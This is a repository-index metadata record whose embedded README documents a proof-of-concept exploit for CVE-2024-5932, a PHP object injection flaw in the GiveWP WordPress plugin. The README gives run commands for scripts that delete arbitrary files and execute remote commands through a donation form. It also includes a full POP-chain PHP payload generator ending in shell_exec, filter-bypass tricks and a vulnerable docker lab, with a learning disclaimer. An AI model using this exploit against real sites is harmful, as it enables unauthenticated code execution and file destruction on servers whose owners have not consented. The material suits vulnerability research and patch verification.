{"id":22218281,"url":"https://github.com/eqstlab/cve-2024-5932","last_synced_at":"2025-05-11T21:14:24.739Z","repository":{"id":254695500,"uuid":"847287273","full_name":"EQSTLab/CVE-2024-5932","owner":"EQSTLab","description":"GiveWP PHP Object Injection exploit","archived":false,"fork":false,"pushed_at":"2025-01-12T11:24:26.000Z","size":25,"stargazers_count":57,"open_issues_count":3,"forks_count":10,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-05-11T21:14:19.079Z","etag":null,"topics":["cve","cve-2024-5932","exploit","givewp","object-injection","php","poc","proof-of-concept","security","vulnerability"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/EQSTLab.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-08-25T11:51:36.000Z","updated_at":"2025-04-11T15:52:52.000Z","dependencies_parsed_at":"2024-12-02T22:20:41.272Z","dependency_job_id":"4e1654c8-0a64-44b4-b62d-b378a3cfa01a","html_url":"https://github.com/EQSTLab/CVE-2024-5932","commit_stats":null,"previous_names":["eqstseminar/cve-2024-5932","eqstlab/cve-2024-5932"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EQSTLab%2FCVE-2024-5932","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EQSTLab%2FCVE-2024-5932/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EQSTLab%2FCVE-2024-5932/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EQSTLab%2FCVE-2024-5932/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/EQSTLab","download_url":"https://codeload.github.com/EQSTLab/CVE-2024-5932/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253633147,"owners_count":21939392,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve","cve-2024-5932","exploit","givewp","object-injection","php","poc","proof-of-concept","security","vulnerability"],"created_at":"2024-12-02T22:20:05.958Z","updated_at":"2025-05-11T21:14:24.694Z","avatar_url":"https://github.com/EQSTLab.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"This post is a research article published by [EQSTLab](https://github.com/EQSTLab).\n\n\n## ❗❗ IMPORTANT ❗❗ \n**There are currently fake PoC github repositories running xmrig. Check out the link below for more information**:\n\nURL1: https://x.com/win3zz/status/1828704644987511107\n\nURL2: https://x.com/bornunique911/status/1828712791844524453\n\nURL3: https://x.com/Chocapikk_/status/1828801346637856841\n\n\n\n# CVE-2024-5932\n★ CVE-2024-5932 Arbitrary File deletion and RCE PoC ★\n\n\n\n\nhttps://github.com/user-attachments/assets/333e347a-fd71-404a-962b-2d0d4bb952c7\n\n\n\n## Timeline\n**Aug 25** : CVE-2024-5932 File Deletion PoC Uploaded\n\n**Aug 26** : We have successfully executed arbitrary commands using CVE-2024-5932, but are considering disclosure due to the impact.\n\n\n**Aug 27** : We found a detailed analysis of the PoC in a [post](https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932/) by Julien Ahrens of RCE Security and decided to publish our RCE PoC. We uploaded an additional RCE PoC as **CVE-2024-5932-rce.py**.\n\n\n## Description\nCVE-2024-5932 : GiveWP PHP Object Injection vulnerability\ndescription: The GiveWP  Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.\n\n## How to use\n\n### Git clone\n```\ngit clone https://github.com/EQSTLab/CVE-2024-5932.git\ncd CVE-2024-5932\n```\n### Install packages \n```sh\npip install -r requirements.txt\n```\n### Command\n```sh\n# Arbitrary file deletion\npython CVE-2024-5932.py -u \u003cURL_TO_EXPLOIT(Donation Form URL)\u003e -f \u003cFILE_TO_DELETE\u003e\n# Remote code execution\npython CVE-2024-5932-rce.py -u \u003cURL_TO_EXPLOIT(Donation Form URL)\u003e -c \u003cCOMMAND_TO_EXECUTE\u003e\n```\n\n### Example \n```sh\npython CVE-2024-5932.py -u http://example.com/2024/08/24/donation2/ -f /tmp/test\npython CVE-2024-5932-rce.py -u http://example.com/2024/08/24/donation2/ -c \"touch /tmp/test\"\n```\n\n### Output\n**CVE-2024-5932.py**\n![0](https://github.com/user-attachments/assets/4ce2bce6-4a24-4d73-9c7e-becd12f2dbe0)\n\n\n**CVE-2024-5932-rce.py**\n![1](https://github.com/user-attachments/assets/d68f4ebf-a1e0-4389-b9e4-e1d23c6fa235)\n\n\n\n### Result\n![image](https://github.com/user-attachments/assets/613f6f4f-8de3-4200-8f29-b46719083bff)\n![2](https://github.com/user-attachments/assets/3bf5402d-baf2-4bc0-8452-8f249a55ebe3)\n\n## Vulnerable Environment\n### 1. docker-compose.yml\n```sh\nservices:\n  db:\n    image: mysql:8.0.27\n    command: '--default-authentication-plugin=mysql_native_password'\n    restart: always\n    environment:\n      - MYSQL_ROOT_PASSWORD=somewordpress\n      - MYSQL_DATABASE=wordpress\n      - MYSQL_USER=wordpress\n      - MYSQL_PASSWORD=wordpress\n    expose:\n      - 3306\n      - 33060\n  wordpress:\n    image: wordpress:6.3.2\n    ports:\n      - 80:80\n    restart: always\n    environment:\n      - WORDPRESS_DB_HOST=db\n      - WORDPRESS_DB_USER=wordpress\n      - WORDPRESS_DB_PASSWORD=wordpress\n      - WORDPRESS_DB_NAME=wordpress\nvolumes:\n  db_data:\n```\n\n### 2. Then download vulnerable GiveWP plugin:\nhttps://downloads.wordpress.org/plugin/give.3.14.1.zip\n\n### 3. Unzip the GiveWP plugin zip file and copy the entire file to the “/var/www/html/wp-content/plugins” directory.\n```sh\ndocker cp give docker-wordpress-1:/var/www/html/wp-content/plugins\n```\n\n### 4. Activate the GiveWP plugin\n![image](https://github.com/user-attachments/assets/11c37afa-17dc-48bf-8819-d0bf24daaab8)\n\n### 5. Add new post with GiveWP plugin and copy the post link\n![image](https://github.com/user-attachments/assets/6b806d89-dfa6-44be-809c-03ba3f666605)\n\n### 6. Check the vulnerable link\n![image](https://github.com/user-attachments/assets/23247a02-d8a0-4bcc-8c3b-0d424dba260d)\n\n\n### (Option) Setup the target file in the docker environment \nFirst, access the wordpress shell with the following command:\n```sh\ndocker exec -it -u root docker-wordpress-1 /bin/bash\n```\n\nIf the file is owned by root, it may not be deleted due to permissions. Therefore, you need to change the ownership of the test file with the following command:\n```sh\ntouch test \u0026\u0026 chown www-data test\n```\n![image](https://github.com/user-attachments/assets/eb46528d-975a-46d3-b917-0a144252798f)\n\n\n## Debugging thru PHPSTORM\nYou can debug your GiveWP using PHPSTORM.\n\n### 1. Download the xdebug in your wordpress(Docker):\n```sh\npecl install xdebug\n```\n\n### 2. And then setup wordpress's php.ini file like(Docker):\n```sh\n[DEBUG]\nzend_extension=/usr/local/lib/php/extensions/no-debug-non-zts-20200930/xdebug.so\nxdebug.mode=debug\nxdebug.start_with_request=trigger\nxdebug.remote_enable=on\nxdebug.remote_handler=dbgp\nxdebug.client_host={your_PHPSTORM_address}\nxdebug.client_port={your_PHPSTORM_debugging_port}\nxdebug.idekey=PHPSTORM\nxdebug.profiler_enable_trigger=1\nxdebug.trace_enable_trigger=1\n```\n..And then you can debug your wordpress.\n\n### 3. Setup PHPSTORM like(Local):\n![image](https://github.com/user-attachments/assets/d236eeba-b482-43e3-9028-3651cdbd10fd)\n![image](https://github.com/user-attachments/assets/021c0cea-fbec-46e5-8824-bf6fd1feaed4)\n\n### 4. PHPSTORM example (e.g. TCPDF arbitrary file deletion)\n![image](https://github.com/user-attachments/assets/433c4824-314e-4982-bf85-34640a259053)\n\n\n# Analysis\n## Vulnerable point (includes/payments/class-give-payment.php)\nAt this point, get_meta() function unserializes the previously saved \"give_title\" value.\n```sh\nswitch ( $key ) {\n\t\t\t\t\t\tcase 'title':\n\t\t\t\t\t\t\t$user_info[ $key ] = Give()-\u003edonor_meta-\u003eget_meta( $donor-\u003eid, '_give_donor_title_prefix', true );\n\t\t\t\t\t\t\tbreak;\n...\n```\n\n## Bypass technique\nstrip_tags: replace nullbytes -\u003e using \\0\n\nstripslashes_deep: replace backslashes -\u003e using \\\\\\\\\\\\\\\\\n\n##  POP chaining for RCE\nStripe\\StripeObject-\u003e__toString()\n\nStripe\\StripeObject-\u003etoArray()\n\nGive\\PaymentGateways\\DataTransferObjects\\GiveInsertPaymentData-\u003etoArray()\n\nGive\\PaymentGateways\\DataTransferObjects\\GiveInsertPaymentData-\u003egetLegacyBillingAddress()\n\nGive-\u003e__get('address1')\n\n\\Give\\Vendors\\Faker\\ValidGenerator-\u003eget('address1')\n\n\\Give\\Vendors\\Faker\\ValidGenerator-\u003e__call('get', 'address1')\n\nGive\\Onboarding\\SettingsRepository-\u003eget('address1')  (Return command string)\n\ncall_user_func('shell_exec', 'command')\n\n\n\nPoC.php\n```sh\n\u003c?php\nnamespace Stripe{\n\tclass StripeObject\n\t{\n\t\tprotected $_values;\n\t\tpublic function __construct(){\n\t\t\t$this-\u003e_values['foo'] = new \\Give\\PaymentGateways\\DataTransferObjects\\GiveInsertPaymentData();\n\t\t}\n\t}\n}\n\nnamespace Give\\PaymentGateways\\DataTransferObjects{\n\tclass GiveInsertPaymentData{\n    public $userInfo;\n\t\tpublic function __construct()\n    {\n        $this-\u003euserInfo['address'] = new \\Give();\n    } \n\t}\n}\t\n\nnamespace{\n\tclass Give{\n\t\tprotected $container;\n\t\tpublic function __construct()\n\t\t{\n\t\t\t$this-\u003econtainer = new \\Give\\Vendors\\Faker\\ValidGenerator();\n\t\t}\n\t}\n}\n\nnamespace Give\\Vendors\\Faker{\n\tclass ValidGenerator{\n\t\tprotected $validator;\n\t\tprotected $generator;\n\t\tpublic function __construct()\n\t\t{\n\t\t\t$this-\u003evalidator = \"shell_exec\";\n\t\t\t$this-\u003egenerator = new \\Give\\Onboarding\\SettingsRepository();\n\t\t}\n\t}\n}\n\nnamespace Give\\Onboarding{\n\tclass SettingsRepository{\n\t\tprotected $settings;\n\t\tpublic function __construct()\n\t\t{\n\t\t\t$this -\u003e settings['address1'] = 'touch /tmp/EQSTtest';\n\t\t}\n\t}\n}\n\nnamespace{\n\t$a = new Stripe\\StripeObject();\n\techo serialize($a);\n}\n```\n\n\n# Attack Scenario\n## RCE thru POP Chain\nPOP Chain allows remote command execution.\n![image](https://github.com/user-attachments/assets/bb6773cc-34e3-4f05-9758-f3fe649bd6de)\n\n## Arbitrary File deletion \nUsing TCPDF, you can exploit the arbitrary file deletion.\n\n# Disclaimer\nThis repository is not intended to be Object injection exploit to CVE-2024-5932. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.\n\n# EQST Insight\nWe publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications.\nhttps://www.skshieldus.com/eng/business/insight.do\n\n# Reference\nhttps://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin/\n\nhttps://skshieldus.com/eng/business/insight.do#\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Feqstlab%2Fcve-2024-5932","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Feqstlab%2Fcve-2024-5932","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Feqstlab%2Fcve-2024-5932/lists"}